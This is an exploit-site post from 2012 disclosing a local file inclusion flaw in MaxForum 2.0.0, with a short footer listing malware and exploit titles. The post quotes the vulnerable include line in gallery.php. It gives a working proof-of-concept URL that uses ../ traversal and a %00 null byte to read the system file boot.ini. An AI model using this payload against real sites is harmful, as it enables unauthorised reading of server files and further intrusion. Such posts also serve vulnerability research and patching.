MaxForum 2.0.0 Local File Inclusion

Posted on 26 September 2012

############################################ ### Exploit Title: MaxForum v2.0.0 Local File Inclusion Vulnerability ### Date: 25/09/2012 ### Author: L0n3ly-H34rT ### Contact: l0n3ly_h34rt@hotmail.com ### My Site: http://se3c.blogspot.com/ ### Vendor Link: http://www.max4dev.com/demo/ar/ ### Software Link: http://sourceforge.net/projects/maxforum/files/2.0.0/Max_v2.0.0.zip/download ### Version : 2.0.0 ( may be old version is affect! i don't check ) ### Tested on: Linux/Windows ############################################ # Affected file ( includes/pages/gallery.php ) on line 42 : include 'gallery/' . $_GET['act'] . '.php'; # P.O.C : http://127.0.0.1/max2/index.php?act=../../../../../../../boot.ini%00&page=gallery ############################################ # Note : Must be magic_quotes_gpc = Off # Greetz to my friendz

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

PHP Remote Code Execution
AEGON LIFE 1.0 SQL Injection
AEGON LIFE 1.0 Remote Code Execution
AEGON LIFE 1.0 Cross Site Scripting
Premium Support Tickets For WHMCS 1.2.10 Cross Site Scripting

Last 20